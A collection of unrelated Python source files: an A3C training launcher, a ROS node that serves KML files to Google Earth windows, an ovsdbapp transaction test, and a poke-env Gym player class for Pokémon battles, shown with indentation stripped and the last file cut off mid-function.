# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0007,
help='learning rate (default: 0.0007)')
parser.add_argument('--gamma', type=float, default=GAMMA,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--alpha', type=float, default=RMSP_ALPHA,
help='RMSprop smoothing constant alpha (default: RMSP_ALPHA)')
parser.add_argument('--eps', type=float, default=RMSP_EPSILON,
help='RMSprop epsilon for numerical stability (default: RMSP_EPSILON)')
parser.add_argument('--tau', type=float, default=1.00,
help='parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=ENTROPY_BETA,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=GRAD_NORM_CLIP,
help='max gradient norm for clipping (default: 40)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=MAX_TIME_STEP,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='bathroom_02',
help='environment to train on (default: bathroom_02)')
parser.add_argument('--no_shared', default=False,
help='run without a shared optimizer (default: False)')
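# Example invocation (hypothetical values; task names and defaults come from
# constants.py in this repo):
#   python main.py --num-processes 8 --lr 0.0007 --env-name bathroom_02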
if __name__ == '__main__':
torch.multiprocessing.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
list_of_tasks = TASK_LIST
scene_scopes = list_of_tasks.keys()
args = parser.parse_args()
torch.manual_seed(args.seed)
#env = create_atari_env(args.env_name)
shared_model = ActorCriticFFNetwork(ACTION_SIZE)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedRMSprop(shared_model.parameters(), lr=args.lr, alpha=args.alpha, eps=args.eps)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
'''
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
'''
branches = []
for scene in scene_scopes:
for task in list_of_tasks[scene]:
branches.append((scene, task))
NUM_TASKS = len(branches)
if os.path.exists(CHECKPOINT_DIR + '/' + 'checkpoint.pth.tar'):
checkpoint = torch.load(CHECKPOINT_DIR + '/' + 'checkpoint.pth.tar',
map_location=lambda storage, loc: storage)
# set global step
shared_model.load_state_dict(checkpoint)
print("Model loaded")
else:
print("Could not find old checkpoint")
for rank in range(0, args.num_processes):
scene, task = branches[rank%NUM_TASKS]
p = mp.Process(target=test, args=(rank, scene, task, args, shared_model, counter))
#p = mp.Process(target=train, args=(rank, scene, task, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
'''
print('Now saving data. Please wait.')
torch.save(shared_model.state_dict(),
CHECKPOINT_DIR + '/' + 'checkpoint.pth.tar')
'''
|
add_kml.py
|
#!/usr/bin/env python
from std_msgs.msg import String
from lg_common.srv import USCSMessage
from interactivespaces_msgs.msg import GenericMessage
import SimpleHTTPServer
import SocketServer
import threading
import tempfile
import rospy
import json
import copy
import os
DEFAULT_VIEWPORTS = ['left_three', 'left_two', 'left_one', 'center',
'right_one', 'right_two', 'right_three']
DEFAULT_EARTH_INSTANCE = {
u'activity': u'earth',
u'activity_config': {},
u'assets': [],
u'height': 1920,
u'presentation_viewport': u'CHANGE_ME',
u'slug': -1875729098,
u'width': 1080,
u'x_coord': 0,
u'y_coord': 0
}
class KMLAdder():
def __init__(self, uscs_service, director_pub, port, hostname='localhost', viewports=None):
self.serve_dir = tempfile.mktemp()
self.uscs_service = uscs_service
self.director_pub = director_pub
self.hostname = hostname
self.viewports = viewports
if self.viewports is None:
self.viewports = DEFAULT_VIEWPORTS
self.port = port
self.server = threading.Thread(target=self._serve)
os.mkdir(self.serve_dir)
self.server.start()
def handle_kml(self, msg):
kml = msg.data
filename = tempfile.mktemp(dir=self.serve_dir)
with open(filename, 'w') as f:
f.write(kml)
current_scene = self.uscs_service.call().message
current_scene = json.loads(current_scene)
self.add_earths(current_scene)
for window in current_scene['windows']:
if window['activity'] != 'earth':
continue
window['assets'].append('http://{}:{}/{}'.format(self.hostname, self.port, os.path.basename(filename)))
new_msg = GenericMessage()
new_msg.type = 'json'
new_msg.message = json.dumps(current_scene)
self.director_pub.publish(new_msg)
def _serve(self):
os.chdir(self.serve_dir)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
self.httpd = SocketServer.TCPServer(("", self.port), Handler)
self.httpd.serve_forever()
def add_earths(self, scene):
for viewport in self.viewports:
flag = False
for window in scene['windows']:
if window['activity'] == 'earth' and window['presentation_viewport'] == viewport:
flag = True
# if no instance of earth w/ our current viewport is found
# we add one and give it our viewport
if flag is False:
scene['windows'].append(copy.deepcopy(DEFAULT_EARTH_INSTANCE))
scene['windows'][-1]['presentation_viewport'] = viewport
def shutdown(self):
self.httpd.shutdown()
self.server.join()
def main():
rospy.init_node('add_kml')
director_pub = rospy.Publisher('/director/scene', GenericMessage, queue_size=10)
uscs_service = rospy.ServiceProxy('/uscs/message', USCSMessage)
hostname = rospy.get_param('~hostname', 'localhost')
port = rospy.get_param('~port', 18111)
k = KMLAdder(uscs_service, director_pub, port, hostname)
rospy.Subscriber('/lg_earth/add_kml', String, k.handle_kml)
rospy.on_shutdown(k.shutdown)
rospy.spin()
if __name__ == '__main__':
main()
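# Hypothetical usage sketch: with the node running, publishing a KML string to
# /lg_earth/add_kml writes it to the temp serve directory, serves it over HTTP,
# and re-publishes the scene so every earth window loads it, e.g.:
#   rostopic pub /lg_earth/add_kml std_msgs/String "data: '<kml>...</kml>'"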
|
test_api.py
|
# Copyright (c) 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from unittest import mock
import fixtures
import testtools
from ovsdbapp import api
from ovsdbapp.tests import base
try:
import eventlet
from eventlet.green import thread
sleep = eventlet.sleep
def create_thread(executable):
eventlet.spawn_n(executable)
except ImportError:
import threading
import time
sleep = time.sleep
def create_thread(executable):
thread = threading.Thread(target=executable)
thread.start()
class GreenThreadingFixture(fixtures.Fixture):
def _setUp(self):
if 'eventlet' in sys.modules:
self._orig = api.threading.get_ident
api.threading.get_ident = thread.get_ident
self.addCleanup(self.cleanup)
def cleanup(self):
api.threading.get_ident = self._orig
class FakeTransaction(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, tb):
self.commit()
def commit(self):
"""Serves just for mock."""
class TestingAPI(api.API):
def create_transaction(self, check_error=False, log_errors=True, **kwargs):
txn = FakeTransaction()
mock.patch.object(txn, 'commit').start()
return txn
TestingAPI.__abstractmethods__ = set()
class TransactionTestCase(base.TestCase):
def setUp(self):
super(TransactionTestCase, self).setUp()
self.api = TestingAPI()
self.useFixture(GreenThreadingFixture())
def test_transaction_nested(self):
with self.api.transaction() as txn1:
with self.api.transaction() as txn2:
self.assertIs(txn1, txn2)
txn1.commit.assert_called_once_with()
def test_transaction_nested_false(self):
with self.api.transaction(nested=False) as txn1:
with self.api.transaction() as txn2:
self.assertIsNot(txn1, txn2)
txn1.commit.assert_called_once_with()
txn2.commit.assert_called_once_with()
def test_api_level_transaction_nested_false(self):
api = TestingAPI(nested_transactions=False)
with api.transaction() as txn1:
with api.transaction() as txn2:
self.assertIsNot(txn1, txn2)
txn1.commit.assert_called_once_with()
txn2.commit.assert_called_once_with()
def test_transaction_no_nested_transaction_after_error(self):
class TestException(Exception):
pass
with testtools.ExpectedException(TestException):
with self.api.transaction() as txn1:
raise TestException()
with self.api.transaction() as txn2:
self.assertIsNot(txn1, txn2)
def test_transaction_nested_multiple_threads(self):
shared_resource = []
def thread1():
with self.api.transaction() as txn:
shared_resource.append(txn)
while len(shared_resource) == 1:
sleep(0.1)
shared_resource.append(0)
def thread2():
while len(shared_resource) != 1:
sleep(0.1)
with self.api.transaction() as txn:
shared_resource.append(txn)
shared_resource.append(0)
create_thread(thread1)
create_thread(thread2)
while len(shared_resource) != 4:
sleep(0.1)
txn1, txn2 = shared_resource[:2]
self.assertNotEqual(txn1, txn2)
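# The semantics under test: within one thread, api.transaction() nests by
# default (txn1 is txn2, a single commit); nested=False or a separate thread
# yields a distinct transaction with its own commit. GreenThreadingFixture
# swaps in eventlet's get_ident so "per thread" means "per green thread"
# whenever eventlet is loaded.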
|
env_player.py
|
# -*- coding: utf-8 -*-
"""This module defines a player class exposing the Open AI Gym API.
"""
from abc import ABC, abstractmethod, abstractproperty
from gym.core import Env # pyre-ignore
from queue import Queue
from threading import Thread
from typing import Any, Callable, List, Optional, Tuple, Union, Dict
from poke_env.environment.abstract_battle import AbstractBattle
from poke_env.environment.battle import Battle
from poke_env.player.battle_order import BattleOrder, ForfeitBattleOrder
from poke_env.player.player import Player
from poke_env.player_configuration import PlayerConfiguration
from poke_env.server_configuration import ServerConfiguration
from poke_env.environment.side_condition import SideCondition
from poke_env.teambuilder.teambuilder import Teambuilder
from poke_env.utils import to_id_str
import asyncio
import numpy as np # pyre-ignore
import time
class EnvPlayer(Player, Env, ABC): # pyre-ignore
"""Player exposing the Open AI Gym Env API. Recommended use is with play_against."""
_ACTION_SPACE = None
_DEFAULT_BATTLE_FORMAT = "gen8randombattle"
MAX_BATTLE_SWITCH_RETRY = 200  # int(10e6)
PAUSE_BETWEEN_RETRIES = 0.001
def __init__(
self,
player_configuration: Optional[PlayerConfiguration] = None,
*,
avatar: Optional[int] = None,
battle_format: Optional[str] = None,
log_level: Optional[int] = None,
save_replays: Union[bool, str] = False,
server_configuration: Optional[ServerConfiguration] = None,
start_listening: bool = True,
start_timer_on_battle_start: bool = False,
team: Optional[Union[str, Teambuilder]] = None,
):
"""
:param player_configuration: Player configuration. If empty, defaults to an
automatically generated username with no password. This option must be set
if the server configuration requires authentication.
:type player_configuration: PlayerConfiguration, optional
:param avatar: Player avatar id. Optional.
:type avatar: int, optional
:param battle_format: Name of the battle format this player plays. Defaults to
gen8randombattle.
:type battle_format: str, optional. Defaults to randombattles, with specifics
varying per class.
:param log_level: The player's logger level.
:type log_level: int. Defaults to logging's default level.
:param save_replays: Whether to save battle replays. Can be a boolean, where
True will lead to replays being saved in a potentially new /replay folder,
or a string representing a folder where replays will be saved.
:type save_replays: bool or str
:param server_configuration: Server configuration. Defaults to Localhost Server
Configuration.
:type server_configuration: ServerConfiguration, optional
:param start_listening: Whether to start listening to the server. Defaults to
True.
:type start_listening: bool
:param start_timer_on_battle_start: Whether to automatically start the battle
timer on battle start. Defaults to False.
:type start_timer_on_battle_start: bool
:param team: The team to use for formats requiring a team. Can be a showdown
team string, a showdown packed team string, or a ShowdownTeam object.
Defaults to None.
:type team: str or Teambuilder, optional
"""
super(EnvPlayer, self).__init__(
player_configuration=player_configuration,
avatar=avatar,
battle_format=battle_format
if battle_format is not None
else self._DEFAULT_BATTLE_FORMAT,
log_level=log_level,
max_concurrent_battles=1,
server_configuration=server_configuration,
start_listening=start_listening,
start_timer_on_battle_start=start_timer_on_battle_start,
team=team,
save_replays=save_replays,
)
self._actions = {}
self._current_battle: AbstractBattle
self._observations = {}
self._reward_buffer = {}
self._alive_buffer = {}
self._health_buffer = {}
self._start_new_battle = False
@abstractmethod
def _action_to_move(
self, action: int, battle: AbstractBattle
) -> BattleOrder: # pragma: no cover
"""Abstract method converting elements of the action space to move orders."""
def _battle_finished_callback(self, battle: AbstractBattle) -> None:
self._observations[battle].put(self.embed_battle(battle))
def _init_battle(self, battle: AbstractBattle) -> None:
self._observations[battle] = Queue()
self._actions[battle] = Queue()
def choose_move(self, battle: AbstractBattle) -> BattleOrder:
if battle not in self._observations or battle not in self._actions:
self._init_battle(battle)
self._observations[battle].put(self.embed_battle(battle))
action = self._actions[battle].get()
return self._action_to_move(action, battle)
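# This Queue pair is the gym<->battle handshake: choose_move publishes the
# current observation, then blocks on the actions queue until the Env side
# (step()/complete_current_battle, the former outside this excerpt) pushes an
# action back, which is translated into a showdown order.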
def close(self) -> None:
"""Unimplemented. Has no effect."""
def complete_current_battle(self) -> None:
"""Completes the current battle by forfeiting."""
self._actions[self._current_battle].put(-1)
def compute_reward(self, battle: AbstractBattle) -> float:
"""Returns a reward for the given battle.
The default implementation corresponds to the default parameters of the
reward_computing_helper method.
:param battle: The battle for which to compute the reward.
:type battle: AbstractBattle
:return: The computed reward.
:rtype: float
"""
return self.reward_computing_helper(battle)
@abstractmethod
def embed_battle(self, battle: AbstractBattle) -> Any: # pragma: no cover
"""Abstract method for embedding battles.
:param battle: The battle whose state is being embedded
:type battle: AbstractBattle
:return: The computed embedding
:rtype: Any
"""
def reset(self) -> Any:
"""Resets the internal environment state. The current battle will be set to an
active unfinished battle.
:return: The observation of the new current battle.
:rtype: Any
:raises: EnvironmentError
"""
try:
if self._current_battle.finished is False:
self.complete_current_battle()
except AttributeError:
pass
for _ in range(self.MAX_BATTLE_SWITCH_RETRY):
battles = dict(self._actions.items())
battles = [b for b in battles if not b.finished]
if battles:
self._current_battle = battles[0]
observation = self._observations[self._current_battle].get()
return observation
time.sleep(self.PAUSE_BETWEEN_RETRIES)
else:
raise EnvironmentError("User %s has no active battle." % self.username)
def render(self, mode="human") -> None:
"""A one line rendering of the current state of the battle."""
print(
" Turn %4d. | [%s][%3d/%3dhp] %10.10s - %10.10s [%3d%%hp][%s]"
% (
self._current_battle.turn,
"".join(
[
"⦻" if mon.fainted else "●"
for mon in self._current_battle.team.values()
]
),
self._current_battle.active_pokemon.current_hp or 0,
self._current_battle.active_pokemon.max_hp or 0,
self._current_battle.active_pokemon.species,
self._current_battle.opponent_active_pokemon.species,
self._current_battle.opponent_active_pokemon.current_hp or 0,
"".join(
[
"⦻" if mon.fainted else "●"
for mon in self._current_battle.opponent_team.values()
]
),
),
end="\n" if self._current_battle.finished else "\r",
)
def reward_computing_helper(
self,
battle: AbstractBattle,
*,
fainted_value: float = 0.0,
hp_value: float = 0.0,
number_of_pokemons: int = 6,
starting_value: float = 0.0,
status_value: float = 0.0,
victory_value: float = 1.0,
rocks_value: float = 0.0,
) -> float:
"""A helper function to compute rewards.
The reward is computed by computing the value of a game state, and by comparing
it to the last state.
State values are computed by weighting different factor. Fainted pokemons,
their remaining HP, inflicted statuses and winning are taken into account.
For instance, if the last time this function was called for battle A it had
a state value of 8 and this call leads to a value of 9, the returned reward will
be 9 - 8 = 1.
Consider a single battle where each player has 6 pokemons. No opponent pokemon
has fainted, but our team has one fainted pokemon. Three opposing pokemons are
burned. We have one pokemon missing half of its HP, and our fainted pokemon has
no HP left.
The value of this state will be:
- With fainted value: 1, status value: 0.5, hp value: 1:
= - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1
- With fainted value: 3, status value: 0, hp value: 1:
= - 3 + 3 * 0 - 1.5 = -4.5
:param battle: The battle for which to compute rewards.
:type battle: AbstractBattle
:param fainted_value: The reward weight for fainted pokemons. Defaults to 0.
:type fainted_value: float
:param hp_value: The reward weight for hp per pokemon. Defaults to 0.
:type hp_value: float
:param number_of_pokemons: The number of pokemons per team. Defaults to 6.
:type number_of_pokemons: int
:param starting_value: The default reference value evaluation. Defaults to 0.
:type starting_value: float
:param status_value: The reward value per non-fainted status. Defaults to 0.
:type status_value: float
:param victory_value: The reward value for winning. Defaults to 1.
:type victory_value: float
:param rocks_value: The reward value for Stealth Rock being up on the opponent's
    side of the field; applied as a penalty when it is on ours. Defaults to 0.
:type rocks_value: float
:return: The reward.
:rtype: float
"""
if battle not in self._reward_buffer:
self._reward_buffer[battle] = starting_value
current_value = 0
for mon in battle.team.values():
current_value += mon.current_hp_fraction * hp_value
if mon.fainted:
current_value -= fainted_value
elif mon.status is not None:
current_value -= status_value
current_value += (number_of_pokemons - len(battle.team)) * hp_value
for mon in battle.opponent_team.values():
current_value -= mon.current_hp_fraction * hp_value
if mon.fainted:
current_value += fainted_value
elif mon.status is not None:
current_value += status_value
current_value -= (number_of_pokemons - len(battle.opponent_team)) * hp_value
if battle.won:
current_value += victory_value
elif battle.lost:
current_value -= victory_value
# stealth rocks: reward when up on the opponent's side, penalize when on ours
if SideCondition.STEALTH_ROCK in battle.opponent_side_conditions:
current_value += rocks_value
if SideCondition.STEALTH_ROCK in battle.side_conditions:
current_value -= rocks_value
to_return = current_value - self._reward_buffer[battle]
self._reward_buffer[battle] = current_value
return to_return
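# Illustrative only: a subclass would typically wire this helper into
# compute_reward with its own weights, e.g.
#
#     def compute_reward(self, battle) -> float:
#         return self.reward_computing_helper(
#             battle, fainted_value=2.0, hp_value=1.0, victory_value=30.0
#         )
#
# The weights above are example values, not ones mandated by this module.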
def reward_computing_helper2(
self,
battle: AbstractBattle,
*,
fainted_value: float = 0.0,
hp_value: float = 0.0,
number_of_pokemons: int = 6,
starting_value: float = 0.0,
status_value: float = 0.0,
victory_value: float = 1.0,
rocks_value: float = 0.0,
) -> float:
"""A helper function to compute rewards.
Unlike :meth:`reward_computing_helper`, the reward is not computed by comparing
full game-state values between calls. Instead, per-battle buffers track each
pokemon's HP fraction and the number of alive pokemons on both sides, and the
reward is the weighted sum of the deltas since the last call: opponent HP lost
(the player-side HP delta is currently disabled, see the inline TODO below),
pokemons fainted on either side, and a victory bonus or defeat penalty.
:param battle: The battle for which to compute rewards.
:type battle: AbstractBattle
:param fainted_value: The reward weight for fainted pokemons. Defaults to 0.
:type fainted_value: float
:param hp_value: The reward weight for hp per pokemon. Defaults to 0.
:type hp_value: float
:param number_of_pokemons: The number of pokemons per team. Defaults to 6.
:type number_of_pokemons: int
:param starting_value: The default reference value evaluation. Defaults to 0.
:type starting_value: float
:param status_value: The reward value per non-fainted status. Defaults to 0.
:type status_value: float
:param victory_value: The reward value for winning. Defaults to 1.
:type victory_value: float
:param rocks_value: Accepted for signature compatibility with
    reward_computing_helper; currently unused here. Defaults to 0.
:type rocks_value: float
:return: The reward.
:rtype: float
"""
if battle not in self._reward_buffer:
self._reward_buffer[battle] = starting_value
if battle not in self._alive_buffer:
self._alive_buffer[battle] = {"player": number_of_pokemons, "opponent": number_of_pokemons}
if battle not in self._health_buffer:
player_health_dict = {}
for mon in battle.team.values():
player_health_dict[mon._species] = 1
opponent_health_dict = {}
for mon in battle.opponent_team.values():
opponent_health_dict[mon._species] = 1
self._health_buffer[battle] = {"player": player_health_dict, "opponent": opponent_health_dict}
current_value = 0
alive_pokemon = {"player": number_of_pokemons, "opponent": number_of_pokemons}
player_health_dict = {}
for mon in battle.team.values():
player_health_dict[mon._species] = mon.current_hp_fraction
if mon.fainted:
alive_pokemon["player"] -= 1
else:
pass
opponent_health_dict = {}
for mon in battle.opponent_team.values():
#for opps, this is always a percentage
opponent_health_dict[mon._species] = mon.current_hp_fraction
if mon.fainted:
alive_pokemon["opponent"] -= 1
else:
pass
delta_player_health = 0
for mon_name in player_health_dict:
delta_player_health += self._health_buffer[battle]["player"][mon_name] - player_health_dict[mon_name]
delta_opponent_health = 0
for mon_name in opponent_health_dict:
#we only add mons into this dict once they are visible
delta_opponent_health += self._health_buffer[battle]["opponent"].get(mon_name, 1) - opponent_health_dict[mon_name]
delta_health = delta_opponent_health  # TODO: delta_player_health subtraction currently disabled
current_value += delta_health * hp_value
delta_pokemon_us = alive_pokemon["player"] - self._alive_buffer[battle]["player"]
current_value += delta_pokemon_us * fainted_value #negative value
delta_pokemon_opponent = self._alive_buffer[battle]["opponent"] - alive_pokemon["opponent"]
current_value += delta_pokemon_opponent * fainted_value #positive value
if battle.won:
current_value += victory_value
elif battle.lost:
current_value -= victory_value
self._alive_buffer[battle] = alive_pokemon
self._health_buffer[battle] = {"player": player_health_dict, "opponent": opponent_health_dict}
return current_value
def seed(self, seed=None) -> None:
"""Sets the numpy seed."""
np.random.seed(seed)
def step(self, action: int) -> Tuple:
"""Performs action in the current battle.
:param action: The action to perform.
:type action: int
:return: A tuple containing the next observation, the reward, a boolean
indicating whether the episode is finished, and additional information
:rtype: tuple
"""
if self._current_battle.finished:
raise ValueError(
"The previous episode is finished. To start a new one, please call reset."
)
else:
self._actions[self._current_battle].put(action)
observation = self._observations[self._current_battle].get()
return (
observation,
self.compute_reward(self._current_battle),
self._current_battle.finished,
{},
)
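# Sketch of the gym-style loop these methods support (assumes an `env`
# instance of a concrete EnvPlayer subclass and an `agent` with an `act`
# method; both names are hypothetical):
#
#     observation = env.reset()
#     done = False
#     while not done:
#         action = agent.act(observation)
#         observation, reward, done, info = env.step(action)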
def play_against(
self, env_algorithm: Callable, opponent: Player, env_algorithm_kwargs=None
):
"""Executes a function controlling the player while facing opponent.
The env_algorithm function is executed with the player environment as first
argument. It exposes the open ai gym API.
Additional arguments can be passed to the env_algorithm function with
env_algorithm_kwargs.
Battles against opponent will be launched as long as env_algorithm is running.
When env_algorithm returns, the current active battle will be finished randomly
if it is not already.
:param env_algorithm: A function that controls the player. It must accept the
player as first argument. Additional arguments can be passed with the
env_algorithm_kwargs argument.
:type env_algorithm: callable
:param opponent: The opponent against which the env player will play.
:type opponent: Player
:param env_algorithm_kwargs: Optional arguments to pass to the env_algorithm.
Defaults to None.
"""
self._start_new_battle = True
async def launch_battles(player: EnvPlayer, opponent: Player):
battles_coroutine = asyncio.gather(
player.send_challenges(
opponent=to_id_str(opponent.username),
n_challenges=1,
to_wait=opponent.logged_in,
),
opponent.accept_challenges(
opponent=to_id_str(player.username), n_challenges=1
),
)
await battles_coroutine
def env_algorithm_wrapper(player, kwargs):
env_algorithm(player, **kwargs)
player._start_new_battle = False
while True:
try:
player.complete_current_battle()
player.reset()
except OSError:
break
loop = asyncio.get_event_loop()
if env_algorithm_kwargs is None:
env_algorithm_kwargs = {}
thread = Thread(
target=lambda: env_algorithm_wrapper(self, env_algorithm_kwargs)
)
thread.start()
while self._start_new_battle:
loop.run_until_complete(launch_battles(self, opponent))
thread.join()
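# Minimal usage sketch, assuming a concrete EnvPlayer subclass instance
# `env_player` and a poke-env RandomPlayer opponent (names not defined in
# this excerpt):
#
#     def run_one_episode(player):
#         player.reset()
#         done = False
#         while not done:
#             _, _, done, _ = player.step(0)
#
#     env_player.play_against(
#         env_algorithm=run_one_episode, opponent=RandomPlayer()
#     )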
@abstractproperty
def action_space(self) -> List:
"""Returns the action space of the player. Must be implemented by subclasses."""
pass
class Gen4EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen4randombattle"
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 10
The action - 4th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif 0 <= action - 4 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 4])
else:
return self.choose_random_move(battle)
@property
def action_space(self) -> List:
"""The action space for gen 7 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 10
The action - 4th available switch in battle.available_switches is executed.
"""
return self._ACTION_SPACE
class Gen5EnvSinglePlayer(Gen4EnvSinglePlayer): # pyre-ignore
_DEFAULT_BATTLE_FORMAT = "gen5randombattle"
class Gen6EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(2 * 4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen6randombattle"
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed, with
mega-evolution.
8 <= action < 14
The action - 8th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif (
battle.can_mega_evolve
and 0 <= action - 4 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 4], mega=True)
elif 0 <= action - 8 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 8])
else:
return self.choose_random_move(battle)
@property
def action_space(self) -> List:
"""The action space for gen 7 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed, with
mega-evolution.
8 <= action < 14
The action - 8th available switch in battle.available_switches is executed.
"""
return self._ACTION_SPACE
class Gen7EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(3 * 4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen7randombattle"
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed, with
z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
12 <= action < 18
The action - 12th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif (
not battle.force_switch
and battle.can_z_move
and battle.active_pokemon
and 0
<= action - 4
< len(battle.active_pokemon.available_z_moves) # pyre-ignore
):
return self.create_order(
battle.active_pokemon.available_z_moves[action - 4], z_move=True
)
elif (
battle.can_mega_evolve
and 0 <= action - 8 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 8], mega=True)
elif 0 <= action - 12 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 12])
else:
return self.choose_random_move(battle)
def gen8_legal_action_mask(self, battle: Battle, switches_on=False) -> List:
legal_actions = [0] * 22
if not battle.force_switch:
for i in range(0, len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_z_move:
for i in range(4, 4+len(battle.active_pokemon.available_z_moves)):
legal_actions[i] = 1
if battle.can_mega_evolve:
for i in range(8, 8 + len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_dynamax:
for i in range(12, 12 + len(battle.available_moves)):
legal_actions[i] = 1
if switches_on:
for i in range(16, 16 + len(battle.available_switches)):
legal_actions[i] += 1
return legal_actions
@property
def action_space(self) -> List:
"""The action space for gen 7 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed,
with z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed,
with mega-evolution.
12 <= action < 18
The action - 12th available switch in battle.available_switches is
executed.
"""
return self._ACTION_SPACE
def legal_action_mask(self, battle: Battle) -> List:
legal_actions = [0] * 18
if not battle.force_switch:
for i in range(0, len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_z_move:
for i in range(4, 4+len(battle.active_pokemon.available_z_moves)):
legal_actions[i] = 1
if battle.can_mega_evolve:
for i in range(8, 8 + len(battle.available_moves)):
legal_actions[i] = 1
for i in range(12, 12 + len(battle.available_switches)):
legal_actions[i] += 1
return legal_actions
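# Example of consuming the mask (illustrative): zero out illegal logits
# before picking an action, e.g. with numpy:
#
#     mask = np.array(self.legal_action_mask(battle))
#     masked = np.where(mask > 0, logits, -np.inf)
#     action = int(np.argmax(masked))
#
# `logits` here is a hypothetical per-action score vector of length 18.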
class Gen8EnvSinglePlayer(EnvPlayer): # pyre-ignore
_ACTION_SPACE = list(range(4 * 4 + 6))
_DEFAULT_BATTLE_FORMAT = "gen8randombattle"
def start_of_battle_procedure(self, battle_idx: int):
return None
def _action_to_move( # pyre-ignore
self, action: int, battle: Battle
) -> BattleOrder:
"""Converts actions to move orders.
The conversion is done as follows:
action = -1:
The battle will be forfeited.
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed, with
z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed, with
mega-evolution.
12 <= action < 16:
The action - 12th available move in battle.available_moves is executed,
while dynamaxing.
16 <= action < 22
The action - 16th available switch in battle.available_switches is executed.
If the proposed action is illegal, a random legal move is performed.
:param action: The action to convert.
:type action: int
:param battle: The battle in which to act.
:type battle: Battle
:return: the order to send to the server.
:rtype: str
"""
if action == -1:
return ForfeitBattleOrder()
elif (
action < 4
and action < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action])
elif (
not battle.force_switch
and battle.can_z_move
and battle.active_pokemon
and 0
<= action - 4
< len(battle.active_pokemon.available_z_moves) # pyre-ignore
):
return self.create_order(
